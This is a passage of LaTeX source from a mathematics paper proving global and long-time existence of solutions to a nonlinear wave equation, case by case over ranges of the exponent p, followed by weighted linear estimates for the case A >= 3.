To prove \Th{Th:M_1}, we need to separate $p\in(p_m,p_M)$ into more parts rather than that in \eqref{Eq:Main_7}, \eqref{Eq:Main_8} or \eqref{Eq:Main_9}. For the reader's convenience, we list them as below. When $(3-A)(A+n+2)<8$, we have $p_d<p_F<p_S<p_t$. Then the proof for $p<p_d$ will be found in \Pt{Pt:4}, $p=p_d$ in \Pt{Pt:6}, $p_d<p<p_S$ in \Pt{Pt:8}, $p=p_S$ in \Pt{Pt:9}, $p_S<p<p_t$ in \Pt{Pt:3}, $p=p_t$ in \Pt{Pt:2} and $p>p_t$ in \Pt{Pt:1}. When $(3-A)(A+n+2)=8$, we have $p_d=p_F=p_S=p_t$. The proof for $p<p_d$ will be found in \Pt{Pt:4}, $p=p_d$ in \Pt{Pt:7} and $p>p_d$ in \Pt{Pt:1}. Finally when $(3-A)(A+n+2)>8$, we have $p_d>p_F>p_S>p_t$. The proof for $p<p_F$ will be found in \Pt{Pt:4}, $p=p_F$ in \Pt{Pt:5} and $p>p_F$ in \Pt{Pt:1}.
Now, we are prepared to give the proofs for each part.
\setcounter{part0}{0}
\value{parta}[$\max(p_t,p_F)<p$]\label{Pt:1}
In this part, we choose $k=1$. For $(t,r)\in\Omega$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega)$ norm on both sides and we get
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega)}\leq& \varepsilon C_0\Psi+C_0\|\omega_1 u_j\|_{L_{t,r}^\infty(\Omega)}^p,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega)}\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{t,r}^\infty(\Omega)}^{p-1}.
\end{Eq*}
For any $\varepsilon>0$ satisfying $(2\varepsilon C_0\Psi)^p<\varepsilon \Psi$, we find
\begin{Eq*
\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega)}\leq 2\varepsilon C_0\Psi
\end{Eq*}
holds for any $j$ since $u_{-1}=0$. Meanwhile, it also gives us
\begin{Eq*}
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega)}\leq& C_0\kl(2\varepsilon C_0\Psi\kr)^{p-1}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega)}\\
\leq &\frac{1}{2}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega)}.
\end{Eq*}
This means $\{u_j\}$ is a Cauchy sequence in weighted $L^\infty$ norm.
Set the limit as $u$. It is easy to check $u$ and $F=r^{\frac{(A-n)p+n-A}{2}}|u|^p$ satisfy \eqref{Eq:u_i_r} while $p<p_F$. Thus we get the desired global weak solution.
\value{parta}[$p_S<p_t=p$]\label{Pt:2}
In this part we take $k=3$. For $(t,r)\in\Omega$ we find
\begin{Eq*}
\omega_3|u_{j+1}|\leq& \varepsilon C_0(\ln\kl<t-r\kr>)^{-1}\Psi+C_0\|\omega_3 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_3|u_{j+1}-u_j|\leq& C_0\|\omega_3 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_3 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Noticing $\kl<t-r\kr>\geq 2$, by a similar process as above we get the desired global solution.
\value{parta}[$p_S<p<p_t$]\label{Pt:3}
In this part we take $k=2$. For $(t,r)\in\Omega$ we find
\begin{Eq*}
\omega_2|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^{\frac{(n-1)p-n-A}{2}}\Psi+C_0\|\omega_2 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_2|u_{j+1}-u_j|\leq& C_0\|\omega_2 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Here $\frac{(n-1)p-n-A}{2}\leq 0$ since $p<p_t$, by a similar process again we get the desired global solution.
\value{parta}[$p<\min(p_d,p_F)$]\label{Pt:4}
In this case, we choose $T_*=T_*(\varepsilon)$ which satisfies $\varepsilon^{p-1}T_*^{\frac{(-n-A+2)p+n+A+2}{2}}=a$ with $a$ to be fixed later. Here we define $\Omega_*:=\Omega\cap \{t:t<T_*\}$ and choose $k=1$. Then for $(t,r)\in\Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\\
&\times\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega_*)$ norm on both sides,
when $T_*\geq 3$ we get
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& \varepsilon C_1\Psi+C_1T_*^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 u_j\|_{L_{t,r}^\infty(\Omega_*)}^p,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& C_1T_*^{\frac{(-n-A+2)p+n+A+2}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_*)}\\
&\times\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{t,r}^\infty(\Omega_*)}^{p-1},
\end{Eq*}
with some $C_1$ large enough.
Considering $\varepsilon$ such that $T_*(\varepsilon)\geq 3$
and defining $a=(2C_1)^{-p}\Psi^{1-p}$,
we conclude that
\begin{Eq*}
\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& 2\varepsilon C_1\Psi,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_*)}\leq& \frac{1}{2}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_*)}
\end{Eq*}
for any $j$, which are sufficient to get the desired solution.
\value{parta}[$p=p_F<p_d$]\label{Pt:5}
In this case,
we choose $T_*$ which satisfies $\varepsilon^{p-1}\ln T_*=a$
with $a$ to be fixed later,
$\Omega_*$ as above and $k=1$.
For $(t,r)\in \Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\ln\kl<t-r\kr>\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\ln\kl<t-r\kr>\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Similar as above,
taking $\varepsilon$ such that $T_*(\varepsilon)\geq 3$,
defining $a:=(2C_1)^{-p}\Psi^{1-p}$ with $C_1$ large enough,
we get the Cauchy sequence $\{u_j\}$ and the desired solution.
\value{parta}[$p=p_d<p_F$]\label{Pt:6}
In this case,
we choose $T_*$ which satisfies
\begin{Eq}\label{Eq:T*_pd}
\varepsilon^{p-1} T_*^\frac{(-n-A+2)p+n+A+2}{2}\ln T_*=a
\end{Eq}
and $\Omega_*$ same as above.
Taking $k=1$,
for $(t,r)\in\Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\ln\kl<t-r\kr>\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(-n-A+2)p+n+A+2}{2}}\ln\kl<t-r\kr>\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\\
&\times\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Choosing $\varepsilon$ such that $T_*(\varepsilon)\geq3$,
$a=(2C_1)^{-p}\Psi^{1-p}$ with $C_1$ large enough,
we get the Cauchy sequence $\{u_j\}$ and the desired solution.
To finish the proof of \Th{Th:M_1} for this part,
we introduce the following claim and postpone its proof to the end of this section.
\begin{claim}\label{Cl:T*_pd}
Assume that $T_*$ satisfies $\varepsilon^{p-1} T_*^\frac{-h_F(p)}{2}\ln T_*=a$ with some constant $a$, then there exists two constant $c_1$, $c_2$ such that $c_1\varepsilon^{\frac{2(p-1)}{h_F(p)}}|\ln \varepsilon |^{\frac{2}{h_F(p)}}\leq T_*\leq c_2\varepsilon^{\frac{2(p-1)}{h_F(p)}}|\ln \varepsilon |^{\frac{2}{h_F(p)}}$ for $\varepsilon$ small enough.
\end{claim}
\value{parta}[$p=p_d=p_F$]\label{Pt:7}
In this case,
we choose $T_*$ which satisfies $\varepsilon^{p-1} (\ln T_*)^2=a$
and $\Omega_*$ same as above.
Taking $k=1$,
for $(t,r)\in\Omega_*$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0(\ln \kl<t-r\kr>)^2\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0(\ln \kl<t-r\kr>)^2\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Choosing $\varepsilon$ such that $T_*(\varepsilon)\geq 3$,
$a=(2C_1)^{-p}\Psi^{1-p}$ and $C_1$ large enough,
we get the Cauchy sequence $\{u_j\}$ and finish the proof.
\value{parta}[$p_d<p<p_S$]\label{Pt:8}
In this case,
we choose $T_*$ which satisfies $\varepsilon^{p(p-1)}T_*^{\frac{(1-n)p^2+(n+1)p+2}{2}}=a$
with $a$ to be fixed later and $\Omega_*$ as above.
Moreover,
we separate the region $\Omega_*$ to
\begin{Eq*}
\Omega_{*1}:=&\Omega_*\cap\{(t,r):\kl<t-r\kr>\leq (b \varepsilon)^{\frac{2(p-1)}{(n-1)p-n-A}}\},\\
\Omega_{*2}:=&\Omega_*\cap\{(t,r):\kl<t-r\kr>\geq (b \varepsilon)^{\frac{2(p-1)}{(n-1)p-n-A}}\},
\end{Eq*}
with $b$ to be fixed later. Firstly we take $k=1$,
for $(t,r)\in\Omega_{*1}$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega_{*1})$ norm on both sides we get
\begin{Eq*}
\kl\|\omega_1u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& \varepsilon C_0\Psi+C_0(b\varepsilon)^{1-p}\|\omega_1 u_j\|_{L_{t,r}^\infty(\Omega_{*1})}^p,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& C_0(b\varepsilon)^{1-p}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{t,r}^\infty(\Omega_{*1})}^{p-1}.
\end{Eq*}
Choosing $b$ such that $(2C_0)^pb^{1-p}\Psi^{p-1}=1$, we find
\begin{Eq}\label{Eq:u_i_1}
\kl\|\omega_1u_{j}\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& 2\varepsilon C_0\Psi,\\
\kl\|\omega_1(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*1})}\leq& \frac{1}{2}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}
\end{Eq}
holds for any $j$.
This means $\{u_j\}$ is a Cauchy sequence in weighted $L^\infty$ norm on $\Omega_{*1}$ region.
On the other hand, for $(t,r)\in \Omega_{*2}$, we separate $\Lambda$ into $\Lambda_1:=\Lambda\cap \Omega_{*1}$ and $\Lambda_2:=\Lambda\cap \Omega_{*2}$.
Because of the linearity of function, we can separate $u_{j+1}(t,r)$ to two terms which determined by the nonlinear terms supported in $\Lambda_1$ and $\Lambda_2$ respectively.
Taking $k=1$ in the former region and $k=2$ in the latter region, for $(t,r)\in \Omega_{*2}$ we find
\begin{Eq*}
\omega_2|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^\frac{(n-1)p-n-A}{2}\Psi+C_0\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda_1)}^p\\
&+C_0\kl<t-r\kr>^{\frac{(1-n)p^2+(n+1)p+2}{2}}\|\omega_2 u_j\|_{L_{s,\rho}^\infty(\Lambda_2)}^p\\
\omega_2|u_{j+1}-u_j|\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda_1)} \max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda_1)}^{p-1},\\
+C_0\kl<t-r\kr>&{}^{\frac{(1-n)p^2+(n+1)p+2}{2}}\|\omega_2 (u_j-u_{j-1})\|_{L_{s,\rho}^\infty(\Lambda_2)}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{s,\rho}^\infty(\Lambda_2)}^{p-1}.
\end{Eq*}
Taking the $L_{t,r}^\infty(\Omega_{*2})$ norm on both sides,
noticing $\kl<t-r\kr>\geq (b \varepsilon)^{\frac{2(p-1)}{(n-1)p-n-A}}$ for $(t,r)\in \Omega_{*2}$
and $(2C_0)^pb^{1-p}\Psi^{p-1}=1$,
and using the estimate in $\Omega_{*1}$,
when $T_*\geq 3$ we get
\begin{Eq*}
\kl\|\omega_2u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq&C_1(\varepsilon \Psi)^p+C_1T_*^{\frac{(1-n)p^2+(n+1)p+2}{2}}\|\omega_2 u_j\|_{L_{t,r}^\infty(\Omega_{*2})}^p,\\
\kl\|\omega_2(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq& C_1(\varepsilon \Psi)^{p-1}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}\\
+C_1T_*^{\frac{(1-n)p^2+(n+1)p+2}{2}}&\|\omega_2 (u_j-u_{j-1})\|_{L_{t,r}^\infty(\Omega_{*2})}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{t,r}^\infty(\Omega_{*2})}^{p-1},
\end{Eq*}
with some $C_1$ large enough.
Choosing $\varepsilon$ such that $T_*(\varepsilon)\geq 3$ and $a=(2C_1)^{-p}\Psi^{p(1-p)}$, we find
\begin{Eq*}
\kl\|\omega_2u_{j+1}\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq&2C_1(\varepsilon \Psi)^p,\\
\kl\|\omega_2(u_{j+1}-u_j)\kr\|_{L_{t,r}^\infty(\Omega_{*2})}\leq& C_1(\varepsilon \Psi)^{p-1}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{t,r}^\infty(\Omega_{*1})}\\
&+\frac{1}{2}\|\omega_2 (u_j-u_{j-1})\|_{L_{t,r}^\infty(\Omega_{*2})},
\end{Eq*}
holds for any $j$.
Now, since we already know $\{u_j\}$ is a Cauchy sequence on $\Omega_{*1}$ region,
we can also know $\{u_j\}$ is a Cauchy sequence in weighted $L^\infty$ norm on $\Omega_{*2}$ region.
In summary, we get the desired solution.
\value{parta}[$p_d<p=p_S$]\label{Pt:9}
In this part,
we choose $T_*$ which satisfies $\varepsilon^{p(p-1)}\ln T_*=a$
and $\Omega_{*1}$, $\Omega_{*2}$ as above with $a,b$ to be fixed latter.
Similarly,
for $(t,r)\in \Omega_{*1}$ we find
\begin{Eq*}
\omega_1|u_{j+1}|\leq& \varepsilon C_0\Psi+C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda)}^p,\\
\omega_1|u_{j+1}-u_j|\leq& C_0\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda)}\max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda)}^{p-1}.
\end{Eq*}
For $(t,r)\in \Omega_{*2}$ we find
\begin{Eq*}
\omega_2|u_{j+1}|\leq& \varepsilon C_0\kl<t-r\kr>^\frac{(n-1)p-n-A}{2}\Psi+C_0\|\omega_1 u_j\|_{L_{s,\rho}^\infty(\Lambda_1)}^p\\
&+C_0\ln\kl<t-r\kr>\|\omega_2 u_j\|_{L_{s,\rho}^\infty(\Lambda_2)}^p\\
\omega_2|u_{j+1}-u_j|\leq& C_0\|\omega_1 \kl(u_j-u_{j-1}\kr)\|_{L_{s,\rho}^\infty(\Lambda_1)} \max_{l\in\{j,j-1\}}\|\omega_1 u_l\|_{L_{s,\rho}^\infty(\Lambda_1)}^{p-1}\\
&+C_0\ln\kl<t-r\kr>\|\omega_2 (u_j-u_{j-1})\|_{L_{s,\rho}^\infty(\Lambda_2)}\max_{l\in\{j,j-1\}}\|\omega_2 u_l\|_{L_{s,\rho}^\infty(\Lambda_2)}^{p-1}.
\end{Eq*}
Taking $b$ satisfying $(2C_0)^pb^{1-p}\Psi^{p-1}=1$,
choosing $\varepsilon$ such that $T_*(\varepsilon)\geq 3$,
$a=(2C_1)^{-p}\Psi^{p(1-p)}$ and $C_1$ large enough, we get the Cauchy sequence $\{u_j\}$ and the desired solution.
Before the end of this section, we show the proof of \Cl{Cl:T*_pd}.
Following \eqref{Eq:T*_pd}, we can easily find
\begin{Eq*}
\varepsilon^{\frac{2(p-1)}{h_F(p)}+\delta}\lesssim T_*\lesssim \varepsilon^{\frac{2(p-1)}{h_F(p)}}
\end{Eq*}
for any $0<\delta\ll1$ and $\varepsilon$ small enough. This suggests us to define
\begin{Eq*}
S(\varepsilon):=\varepsilon^{-\frac{2(p-1)}{h_F(p)}}T_*,\qquad \varepsilon^{\delta}\lesssim S\lesssim 1.
\end{Eq*}
Then, \eqref{Eq:T*_pd} goes to
\begin{Eq*}
a=S^\frac{-h_F(p)}{2}\ln\kl(\varepsilon^{\frac{2(p-1)}{h_F(p)}}S\kr)\approx S^\frac{-h_F(p)}{2}|\ln\varepsilon|,
\end{Eq*}
and then
\begin{Eq*}
S\approx |\ln \varepsilon|^{\frac{2}{h_F(p)}},\qquad T_*\approx \varepsilon^{\frac{2(p-1)}{h_F(p)}}|\ln \varepsilon|^{\frac{2}{h_F(p)}},
\end{Eq*}
which finishes the proof.
\section{Long-time existence for $A\in[3,\infty)$}\label{Se:4}
In this section, we will consider the case $A\in[3,\infty)$, and show the proof of \Th{Th:M_2}. Again, we only need to consider the equation \eqref{Eq:u_o}.
\subsection{Estimate for linear solution}
In this subsection, we will construct some prior estimates of the solution to the linear equation \eqref{Eq:u_l}. Firstly we give the following argument.
\begin{lemma}\label{Le:ul_e1}
Let $u$ be the solution of \eqref{Eq:u_l}. We have
\begin{Eq}\label{Eq:ul_e11}
\kl\|r^{\frac{A-1}{2}}u\kr\|_{L_t^\infty L_r^q}\lesssim& \|r^{\frac{A+1}{2}}g\|_{L_r^q}+ \|r^{\frac{A-1}{2}}f\|_{L_r^q}+\|r^{\frac{A+1}{2}}F\|_{L_t^qL_r^1},
\end{Eq}
for any $1<q<\infty$, and
\begin{Eq}\label{Eq:ul_e12}
\kl\|r^{\frac{A-1}{2}-\alpha}u\kr\|_{L_t^\sigma L_r^p}\lesssim& \|r^{\frac{A+1}{2}}g\|_{L_r^q}+ \|r^{\frac{A-1}{2}}f\|_{L_r^q}+\|r^{\frac{A+1}{2}}F\|_{L_t^qL_r^1},
\end{Eq}
provided that
\begin{Eq}\label{Eq:sigpq_r}
1<\frac{q}{p}<\frac{\sigma}{p}<\infty,\qquad~\alpha p=1-\frac{p}{q}+\frac{p}{\sigma}.
\end{Eq}
\end{lemma}
We also have a modification result.
\begin{lemma}\label{Le:ul_e2}
Let $u$ be the solution of \eqref{Eq:u_l}. If $1<p\leq (n+1)/(n-1)$, then
\begin{Eq}\label{Eq:ul_e21}
&(T+1)^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u(T,r)\kr\|_{L_r^p(r<T+1)}\\
\lesssim& \|r^{\frac{A+1}{2}}g\|_{L_r^p}+ \|r^{\frac{A-1}{2}}f\|_{L_r^p}+\|r^{\frac{A+1}{2}}F\|_{L_t^pL_r^1(t<T)}.
\end{Eq}
Also,
if $(n+1)/(n-1)\leq p\leq p_S$,
then
\begin{Eq}\label{Eq:ul_e22}
&T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u(T,r)\kr\|_{L_r^p}\\
\lesssim& \|r^{\frac{A+1}{2}+\frac{1}{p}}g\|_{L_r^\infty}+ \|r^{\frac{A-1}{2}+\frac{1}{p}}f\|_{L_r^\infty}+T^{\frac{1}{p}}\|r^{\frac{A+1}{2}}F\|_{L_t^\infty L_r^1(T/4<t<T)}\\
&+\|r^{\frac{A+1}{2}}g\|_{L_r^p}+ \|r^{\frac{A-1}{2}}f\|_{L_r^p}+\|r^{\frac{A+1}{2}}F\|_{L_t^pL_r^1(t<T/4)}.
\end{Eq}
\end{lemma}
\begin{proof}[Proof of \Le{Le:ul_e1}]
When $A\in {\mathbb{Z}}_+$,
this result is exactly the same with the Theorem 4.7 of \cite{MR1408499}
since we can take $\kappa$ in Theorem 4.7 arbitrary close to $2$.
So we only deal with the non-integer case.
Here we introduce $\delta< (A-3)/2$ which will be fixed later.
Firstly we consider $u=u_g$.
Using \Le{Le:u_e} and \Le{Le:I_p} with $\mu=\frac{r^2+\rho^2-t^2}{2r\rho}$,
we have
\begin{Eq*}
r^{\frac{A-1}{2}}|u_g|\lesssim&
\int_{|t-r|}^{t+r}(1+\mu)^{-\delta}\rho^{\frac{A-1}{2}}|g(\rho)|\d\rho+\int\limits_{0<\rho<t-r\atop -2<\mu<-1}|1+\mu|^{-\delta}\rho^{\frac{A-1}{2}}|g(\rho)|\d\rho\\
&+\int\limits_{0<\rho<t-r\atop \mu<-2}(1-\mu)^{\frac{1-A}{2}}\rho^{\frac{A-1}{2}}|g(\rho)|\d\rho\\
\lesssim&\int_{|t-r|}^{t+r}(1+\mu)^{-\delta}\rho^{-1}|\rho^{\frac{A+1}{2}}g(\rho)|\d\rho\\
&+\int\limits_{0<\rho<t-r}(1-\mu)^{-1}|1+\mu|^{-\delta}\rho^{-1}|\rho^{\frac{A+1}{2}}g(\rho)|\d\rho,
\end{Eq*}
where the second integral does not appear for $t<r$.
Using Proposition 2.7 and Proposition 4.4 in \cite{MR1408499}, we obtain the estimate as we desired.
Next we consider $u=u_f$. Here for simplicity we denote $h(\rho):=\rho^{\frac{A-1}{2}}f(\rho)$.
Using \Le{Le:u_e} and \Le{Le:I_p} again with $\mu=\frac{r^2+\rho^2-t^2}{2r\rho}$,
for $r<t$ we find
\begin{Eq*}
r^{\frac{A-1}{2}}u_f=&\frac{1}{2}h(t+r)-P.V.\int_0^{t+r}\frac{t}{r\rho}I_A'(\mu)h(\rho)\d\rho,\\
r^{\frac{A-1}{2}}|u_f|\lesssim& \frac{1}{2}|h(t+r)|+\kl|P.V.\int\limits_{0\leq\rho\leq t+r\atop -2<\mu<1}\frac{t}{r\rho}(1+\mu)^{-1}h(\rho)\d\rho\kr|\\
&+\int\limits_{0\leq\rho\leq t+r\atop -2<\mu<1}\frac{t}{r\rho}|1+\mu|^{-\delta}|h(\rho)|\d\rho+\int\limits_{0\leq\rho\leq t-r\atop \mu<-2}\frac{t}{r\rho}|1-\mu|^{\frac{-1-A}{2}}|h(\rho)|\d\rho\\
\lesssim&\frac{1}{2}|h(t+r)|+\kl|P.V.\int_{0}^{t+r}\frac{t}{r\rho}(1+\mu)^{-1}h(\rho)\d\rho\kr|\\
&+\int_{0}^{t-r}\frac{t}{r\rho}|1-\mu|^{-1}|h(\rho)|\d\rho+\int_{t-r}^{t+r}\frac{t}{r\rho}|1+\mu|^{-\delta}|h(\rho)|\d\rho\\
&+\int_0^{t-r}\frac{t}{r\rho}(1-\mu)^{-1}|1+\mu|^{-\delta}|h(\rho)|\d\rho\\
\equiv& K_1+K_2+K_3+K_4+K_5.
\end{Eq*}
It's easy to find that
\begin{Eq*}
\|K_1\|_{L_t^\infty L_r^q}\lesssim \|h\|_{L_r^q}.
\end{Eq*}
On the other, we introduce the well known \emph{Hardy-Littlewood} inequality
\begin{Eq*}
\kl\||y|^{-\alpha}f(x\pm y)\kr\|_{L_x^\sigma L_y^p({\mathbb{R}}^2)} \lesssim \|f\|_{L^q({\mathbb{R}})},
\end{Eq*}
with \eqref{Eq:sigpq_r}. Now, taking $f(x)=|h(x)|\chi_{[0,\infty)}(x)$, we also find
\begin{Eq*}
\|r^{-\alpha}K_1\|_{L_t^\sigma L_r^p}\lesssim \|h\|_{L_r^q},
\end{Eq*}
provided that \eqref{Eq:sigpq_r}.
Meanwhile, adopting Proposition 2.5 in \cite{MR1408499} to deal with $K_4$, and adopting Proposition 4.4 in \cite{MR1408499} for $K_3$ and $K_5$, we find both of them have the same control as $K_1$.
As for $K_2$, noticing
\begin{Eq*}
\frac{t}{r\rho}(1+\mu)^{-1}=\frac{1}{r+\rho-t}-\frac{1}{t+r+\rho},
\end{Eq*}
we can control $K_2$ by
\begin{Eq*}
K_2\lesssim &\kl|P.V.\int_0^\infty \frac{1}{\rho+r-t}h(\rho)\d\rho\kr|+\int_{t+r}^\infty \frac{1}{\rho+r-t}|h(\rho)|\d\rho\\
&+\frac{1}{t+r}\int_0^{t+r}|h(\rho)|\d\rho\\
\equiv&K_{2,1}(t-r)+K_{2,2}(t,r)+K_{2,3}(t+r).
\end{Eq*}
For $K_{2,1}$, we introduce the estimate of \emph{Hilbert}-transform
\begin{Eq*}
\kl\|P.V.\int \frac{1}{x-y}f(y)\d y\kr\|_{L_x^q}\lesssim \|f\|_{L_x^q}
\end{Eq*}
with $1<q<\infty$. Taking $f(x)=h(x)\chi_{[0,\infty)}(x)$, we find
\begin{Eq*}
\kl\|K_{2,1}(t-r)\kr\|_{L_t^\infty L_r^q}=\kl\|K_{2,1}(r)\kr\|_{L_r^q}\lesssim \|h\|_{L^q}.
\end{Eq*}
Also, using \emph{Hardy-Littlewood} inequality again, we get the dominate of $K_{2,1}(t-r)$ same as that of $K_1$ provided that \eqref{Eq:sigpq_r}. As for $K_{2,3}$, we introduce the \emph{Hardy-Littlewood} maximal inequality
\begin{Eq*}
\kl\|\sup_{y>0}\frac{1}{2y}\int_{x-y}^{x+y} f(z)\d z\kr\|_{L_x^q}\lesssim \|f\|_{L^q}
\end{Eq*}
with $1<q<\infty$. Taking $f(x)=h(x)\chi_{[0,\infty)}(x)$, we find
\begin{Eq*}
\kl\|K_{2,3}(t+r)\kr\|_{L_t^\infty L_r^q}=\kl\|K_{2,3}(r)\kr\|_{L_r^q}\lesssim \|h\|_{L^q}.
\end{Eq*}
Using \emph{Hardy-Littlewood} inequality again, we get the dominate of $K_{2,3}(t+r)$ same as that of $K_1$ provided that \eqref{Eq:sigpq_r}.
Finally, for $K_{2,2}(t,r)$, we have
\begin{Eq*}
K_{2,2}(t,r)=\int_r^\infty \frac{1}{\rho+r}|h(\rho+t)|\d\rho\leq \int_r^\infty \rho^{-1}|h(\rho+t)|\d\rho.
\end{Eq*}
Then, using \emph{Hardy's} inequality we find
\begin{Eq*}
\|K_{2,2}\|_{L_t^\infty L_r^q}\lesssim \|h\|_{L_r^q}.
\end{Eq*}
On the other hand, for any $G(t,r)$ with $\|G\|_{L_t^{\sigma'}L_r^{p'}}\leq 1$ we see
\begin{Eq*}
